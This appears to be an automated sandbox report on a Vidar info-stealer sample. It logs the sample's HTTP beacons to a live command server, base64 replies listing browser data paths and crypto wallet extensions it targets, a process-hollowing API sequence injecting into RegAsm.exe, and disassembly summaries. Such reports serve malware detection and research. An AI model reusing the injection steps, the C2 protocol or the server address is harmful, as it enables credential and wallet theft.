2024-09-26 17:49:34 UTC	69	IN	Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 66 36 62 35 61 37 35 30 37 38 62 35 33 61 65 61 65 34 32 35 33 36 66 61 36 61 32 35 33 31 35 34 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a Data Ascii: 3a1\|1\|1\|1\|f6b5a75078b53aeae42536fa6a253154\|1\|1\|1\|0\|0\|50000\|10

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49742	5.75.211.162	443	5676	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 17:49:34 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----AEBAFBGIDHCBFHIECFCB User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 17:49:34 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 36 62 35 61 37 35 30 37 38 62 35 33 61 65 61 65 34 32 35 33 36 66 61 36 61 32 35 33 31 35 34 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 32 36 37 33 35 63 62 65 38 63 61 39 65 37 35 37 31 32 66 66 65 33 61 61 34 30 63 34 61 36 30 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 42 0d 0a 43 6f 6e 74 Data Ascii: ------AEBAFBGIDHCBFHIECFCBContent-Disposition: form-data; name="token"f6b5a75078b53aeae42536fa6a253154------AEBAFBGIDHCBFHIECFCBContent-Disposition: form-data; name="build_id"b26735cbe8ca9e75712ffe3aa40c4a60------AEBAFBGIDHCBFHIECFCBCont
2024-09-26 17:49:35 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 17:49:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 17:49:35 UTC	1564	IN	Data Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45 Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49743	5.75.211.162	443	5676	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 17:49:36 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----GIIIIJDHJEGIECBGHIJE User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 17:49:36 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 49 49 49 49 4a 44 48 4a 45 47 49 45 43 42 47 48 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 36 62 35 61 37 35 30 37 38 62 35 33 61 65 61 65 34 32 35 33 36 66 61 36 61 32 35 33 31 35 34 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 49 49 4a 44 48 4a 45 47 49 45 43 42 47 48 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 32 36 37 33 35 63 62 65 38 63 61 39 65 37 35 37 31 32 66 66 65 33 61 61 34 30 63 34 61 36 30 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 49 49 4a 44 48 4a 45 47 49 45 43 42 47 48 49 4a 45 0d 0a 43 6f 6e 74 Data Ascii: ------GIIIIJDHJEGIECBGHIJEContent-Disposition: form-data; name="token"f6b5a75078b53aeae42536fa6a253154------GIIIIJDHJEGIECBGHIJEContent-Disposition: form-data; name="build_id"b26735cbe8ca9e75712ffe3aa40c4a60------GIIIIJDHJEGIECBGHIJECont
2024-09-26 17:49:37 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 17:49:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 17:49:37 UTC	5685	IN	Data Raw: 31 36 32 38 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62 Data Ascii: 1628TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49744	5.75.211.162	443	5676	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 17:49:38 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----DAFCAAEGDBKJJKECBKFH User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 332 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 17:49:38 UTC	332	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 41 46 43 41 41 45 47 44 42 4b 4a 4a 4b 45 43 42 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 36 62 35 61 37 35 30 37 38 62 35 33 61 65 61 65 34 32 35 33 36 66 61 36 61 32 35 33 31 35 34 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 43 41 41 45 47 44 42 4b 4a 4a 4b 45 43 42 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 32 36 37 33 35 63 62 65 38 63 61 39 65 37 35 37 31 32 66 66 65 33 61 61 34 30 63 34 61 36 30 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 43 41 41 45 47 44 42 4b 4a 4a 4b 45 43 42 4b 46 48 0d 0a 43 6f 6e 74 Data Ascii: ------DAFCAAEGDBKJJKECBKFHContent-Disposition: form-data; name="token"f6b5a75078b53aeae42536fa6a253154------DAFCAAEGDBKJJKECBKFHContent-Disposition: form-data; name="build_id"b26735cbe8ca9e75712ffe3aa40c4a60------DAFCAAEGDBKJJKECBKFHCont
2024-09-26 17:49:39 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 17:49:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 17:49:39 UTC	119	IN	Data Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180

Target ID:	0
Start time:	13:49:09
Start date:	26/09/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x90000
File size:	413'224 bytes
MD5 hash:	4453D7BC66E29C48ED6495BFA820E5B5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.1775378329.00000000033D5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.1775378329.00000000033D5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	13:49:09
Start date:	26/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	13:49:09
Start date:	26/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xf0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	13:49:09
Start date:	26/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x7b0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	13:49:38
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 5676 -s 2188
Imagebase:	0x7ff72bec0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	36.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	29.6%
Total number of Nodes:	27
Total number of Limit Nodes:	1

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 023D212D Relevance: 44.0, APIs: 11, Strings: 14, Instructions: 282
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000,00000000,00000000,00000004,00000000,00000000,023D209F,023D208F), ref: 023D229C
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 023D22AF
Wow64GetThreadContext.KERNEL32(0000008C,00000000), ref: 023D22CD
ReadProcessMemory.KERNELBASE(00000088,?,023D20E3,00000004,00000000), ref: 023D22F1
VirtualAllocEx.KERNELBASE(00000088,?,?,00003000,00000040), ref: 023D231C
TerminateProcess.KERNELBASE(00000088,00000000), ref: 023D233B
WriteProcessMemory.KERNELBASE(00000088,00000000,?,?,00000000,?), ref: 023D2374
WriteProcessMemory.KERNELBASE(00000088,00400000,?,?,00000000,?,00000028), ref: 023D23BF
WriteProcessMemory.KERNELBASE(00000088,-00000008,?,00000004,00000000), ref: 023D23FD
Wow64SetThreadContext.KERNEL32(0000008C,023B0000), ref: 023D2439
ResumeThread.KERNELBASE(0000008C), ref: 023D2448

Strings

GetThreadContext, xrefs: 023D2207
GetP, xrefs: 023D21AF
CreateProcessA, xrefs: 023D21E1
ress, xrefs: 023D21B7
SetThreadContext, xrefs: 023D2253
ResumeThread, xrefs: 023D2269
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 023D229B
TerminateProcess, xrefs: 023D232B
VirtualAlloc, xrefs: 023D21F4
aryA, xrefs: 023D2173
WriteProcessMemory, xrefs: 023D2240
VirtualAllocEx, xrefs: 023D222D
ReadProcessMemory, xrefs: 023D221A
Load, xrefs: 023D216B

Memory Dump Source

Source File: 00000000.00000002.1773878168.00000000023D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 023D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23d1000_file.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResumeTerminate
String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$CreateProcessA$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
API String ID: 2440066154-1257834847
Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
Instruction ID: bd880d19965f6c64113b46f2d40a530e13c5825d88d2511e9bcfc7075c2b3005
Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
Instruction Fuzzy Hash: ABB1E67664024AAFDB60CF68CC80BDA77A5FF88714F158524EA0CAB342D774FA418B94

Function 02330C40 Relevance: 2.8, Strings: 2, Instructions: 320
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

@O8E, xrefs: 02330F4A
@O8E, xrefs: 02330F6A

Memory Dump Source

Source File: 00000000.00000002.1773785601.0000000002330000.00000040.00000800.00020000.00000000.sdmp, Offset: 02330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2330000_file.jbxd

Similarity

API ID:
String ID: @O8E$@O8E
API String ID: 0-3380979170
Opcode ID: d5a38ee0522d1c094996b815e6cfd06f16c7e558f4c7d81e15b22d94e7f9c6ef
Instruction ID: 9bc1591dbcbf786122ce9eda27deedc002eb5cd70929d4dadf4e2ba0a515c022
Opcode Fuzzy Hash: d5a38ee0522d1c094996b815e6cfd06f16c7e558f4c7d81e15b22d94e7f9c6ef
Instruction Fuzzy Hash: 3DD1AD70A142589FCB1ACFA8C9807EDFBF2BF48314F248569E455E7256C734AE41CBA4

Function 023312E1 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 88
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 023312A0

Strings

@O8E, xrefs: 0233130A

Memory Dump Source

Source File: 00000000.00000002.1773785601.0000000002330000.00000040.00000800.00020000.00000000.sdmp, Offset: 02330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2330000_file.jbxd

Similarity

API ID: ProtectVirtual
String ID: @O8E
API String ID: 544645111-3502195768
Opcode ID: ac40df4584c455af476b38d66c93af66f571f2b038669059487fb58baa20e749
Instruction ID: 5b853d007ceeab46a51e3f9c724abee20f005b4a6308a21a71404ceec09fe9d2
Opcode Fuzzy Hash: ac40df4584c455af476b38d66c93af66f571f2b038669059487fb58baa20e749
Instruction Fuzzy Hash: AE3142B29002588FCF11CFA9D884BDEBBF0AF49324F14805AE848AB261C7749944CFA1

Function 02331218 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 59
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 023312A0

Strings

@O8E, xrefs: 0233123F

Memory Dump Source

Source File: 00000000.00000002.1773785601.0000000002330000.00000040.00000800.00020000.00000000.sdmp, Offset: 02330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2330000_file.jbxd

Similarity

API ID: ProtectVirtual
String ID: @O8E
API String ID: 544645111-3502195768
Opcode ID: e63957868e1b4fa4c1bdf20cd7f4e4f1b7a64d782cf4a9c26121b66d6dcded04
Instruction ID: 4c8f34d92a501e2337c080ca376c6f6ddbbc7998ee85917a6b5b0427281d95f8
Opcode Fuzzy Hash: e63957868e1b4fa4c1bdf20cd7f4e4f1b7a64d782cf4a9c26121b66d6dcded04
Instruction Fuzzy Hash: 022102B59002599FCB10DFAAD980AEEFBF0FF48314F10852EE959A7250C7749954CFA1

Function 02331220 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 023312A0

Strings

@O8E, xrefs: 0233123F

Memory Dump Source

Source File: 00000000.00000002.1773785601.0000000002330000.00000040.00000800.00020000.00000000.sdmp, Offset: 02330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2330000_file.jbxd

Similarity

API ID: ProtectVirtual
String ID: @O8E
API String ID: 544645111-3502195768
Opcode ID: f8861fd40c8990b60da6aa265afeeb99821bd324f5e6557fda2a6b32afbdf23c
Instruction ID: d95c8f648576f9abb20dd7cf7ccfed5d5b6eee13600977ab27e3c92c226129d1
Opcode Fuzzy Hash: f8861fd40c8990b60da6aa265afeeb99821bd324f5e6557fda2a6b32afbdf23c
Instruction Fuzzy Hash: 182110B19002599FCB10DFAAD980ADEFBF4FF48314F10842AE959A7250CB74A944CFA5

Analysis Process: RegAsm.exePID: 5676, Parent PID: 928COMMON

Execution Graph

Execution Coverage:	13.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	5.5%
Total number of Nodes:	1153
Total number of Limit Nodes:	29

Executed Functions

Function 00411807 Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 143
comtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 0041180E
CoInitializeEx.OLE32(00000000,00000000,0000004C,00413EF9,Install Date: ,004368B0,00000000,Windows: ,004368A0,Work Dir: In memory,00436888), ref: 0041181F
CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00411830
CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 0041184A
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411880
VariantInit.OLEAUT32(?), ref: 004118DB

Part of subcall function 00411757: __EH_prolog3_catch.LIBCMT ref: 0041175E
Part of subcall function 00411757: CoCreateInstance.OLE32(004331B0,00000000,00000001,0043AF60,?,00000018,00411901,?), ref: 00411781
Part of subcall function 00411757: SysAllocString.OLEAUT32(?), ref: 0041178E
Part of subcall function 00411757: _wtoi64.MSVCRT ref: 004117C1
Part of subcall function 00411757: SysFreeString.OLEAUT32(?), ref: 004117DA
Part of subcall function 00411757: SysFreeString.OLEAUT32(00000000), ref: 004117E1

FileTimeToSystemTime.KERNEL32(?,?), ref: 0041190A
VariantClear.OLEAUT32(?), ref: 0041195C

Strings

Unknown, xrefs: 00411985
%d/%d/%d %d:%d:%d, xrefs: 00411943
InstallDate, xrefs: 004118ED
Unknown, xrefs: 0041196A
ROOT\CIMV2, xrefs: 00411862
Unknown, xrefs: 00411971
Select * From Win32_OperatingSystem, xrefs: 00411895
WQL, xrefs: 0041189A

Memory Dump Source

Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: String$CreateFreeInitializeInstanceTimeVariant$AllocBlanketClearFileH_prolog3_catchH_prolog3_catch_InitProxySecuritySystem_wtoi64
String ID: %d/%d/%d %d:%d:%d$InstallDate$ROOT\CIMV2$Select * From Win32_OperatingSystem$Unknown$Unknown$Unknown$WQL
API String ID: 2027821108-461178377
Opcode ID: fe6b9a04deeaae94ce61e149b8f4aed9b6b3574a86b373e3e1773863a37c8a56
Instruction ID: 9b83a2dca4a1b3c6c0afd6b9e082c19a49acb0dc1fc89349d09b2b61b6485616
Opcode Fuzzy Hash: fe6b9a04deeaae94ce61e149b8f4aed9b6b3574a86b373e3e1773863a37c8a56
Instruction Fuzzy Hash: F7418D71940209BBCB20CBD5DC89EEFBBBDEFC9B11F20411AF611A6190D7799941CB28

Function 00406963 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 161
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

InternetOpenA.WININET(?,00000001,00000000,00000000,00000000,00436997), ref: 004069C5
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406A0E
HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00406A4D
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406A88
InternetReadFile.WININET(?,?,000007CF,?), ref: 00406B40
InternetCloseHandle.WININET(?), ref: 00406B50

Strings

ERROR, xrefs: 00406AB6
ERROR, xrefs: 00406BAB
GET, xrefs: 00406A42

Memory Dump Source

Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internet$HttpOpenRequest$CloseConnectCrackFileHandleReadSend
String ID: ERROR$ERROR$GET
API String ID: 3281277790-2509457195
Opcode ID: 4ec13abdfe32b591f6d3eedb5c933f1c527e1304724b0b24799dd44745f4032a
Instruction ID: 58d07afc169a1ce0b47171bb7ce7cc0903f1f08f96176c9b1f2a19a3da15bd67
Opcode Fuzzy Hash: 4ec13abdfe32b591f6d3eedb5c933f1c527e1304724b0b24799dd44745f4032a
Instruction Fuzzy Hash: 9D51AEB1A00269AFDF20EB60DC84AEEB7B9FB04304F0181B6F549B2190DA755EC59F94

Function 0041BC21 Relevance: 7.6, APIs: 5, Instructions: 99fileCOMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(?,00000000,00000000,00000001,759774F0,?,0041CBEE,?,0041CC7C,00000000,06400000,00000003,00000000,0041757F,.exe,00436C5C), ref: 0041BC6E
CreateFileA.KERNEL32(?,40000000,00000000,00000000,?,00000080,00000000,759774F0,?,0041CBEE,?,0041CC7C,00000000,06400000,00000003,00000000), ref: 0041BCA6

Memory Dump Source

Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$CreatePointer
String ID:
API String ID: 2024441833-0
Opcode ID: c2a5f8e1d00489231e5594f9a747e25d59c8a13e659a0516d0e6ae57d101117a
Instruction ID: ff1efad9a67633d22899531c3285d4c1b5d125596630838d4b1aaea72c6dc67b
Opcode Fuzzy Hash: c2a5f8e1d00489231e5594f9a747e25d59c8a13e659a0516d0e6ae57d101117a
Instruction Fuzzy Hash: CA31A2F0504B049FDB348F24A9D4BA37AE8EB15314F108E2FF19682691D33898C49B99

Function 004114A5 Relevance: 4.6, APIs: 3, Instructions: 56processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(?,00000000,00436712,?,?), ref: 004114D4
Process32First.KERNEL32(00000000,00000128), ref: 004114E4
Process32Next.KERNEL32(00000000,00000128), ref: 00411542

Memory Dump Source

Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process32$CreateFirstNextSnapshotToolhelp32
String ID:
API String ID: 1238713047-0
Opcode ID: 6ecd6e103f958e55985b85a8d6cec58a1d4901635c4c4c9a6a92631ed1d39a01
Instruction ID: df159de601ea63d42004a6701442e9789206b56ac97d0af79a31bc2d218e3f7e
Opcode Fuzzy Hash: 6ecd6e103f958e55985b85a8d6cec58a1d4901635c4c4c9a6a92631ed1d39a01
Instruction Fuzzy Hash: FB117371A00214ABDB21EB65DC85BED73A9AB48308F400097F905A3291DB78AEC59B69

Function 00410C53 Relevance: 4.5, APIs: 3, Instructions: 19memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004013B9), ref: 00410C5F
HeapAlloc.KERNEL32(00000000,?,?,?,004013B9), ref: 00410C66
GetUserNameA.ADVAPI32(00000000,004013B9), ref: 00410C7A

Memory Dump Source

Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocNameProcessUser
String ID:
API String ID: 1206570057-0
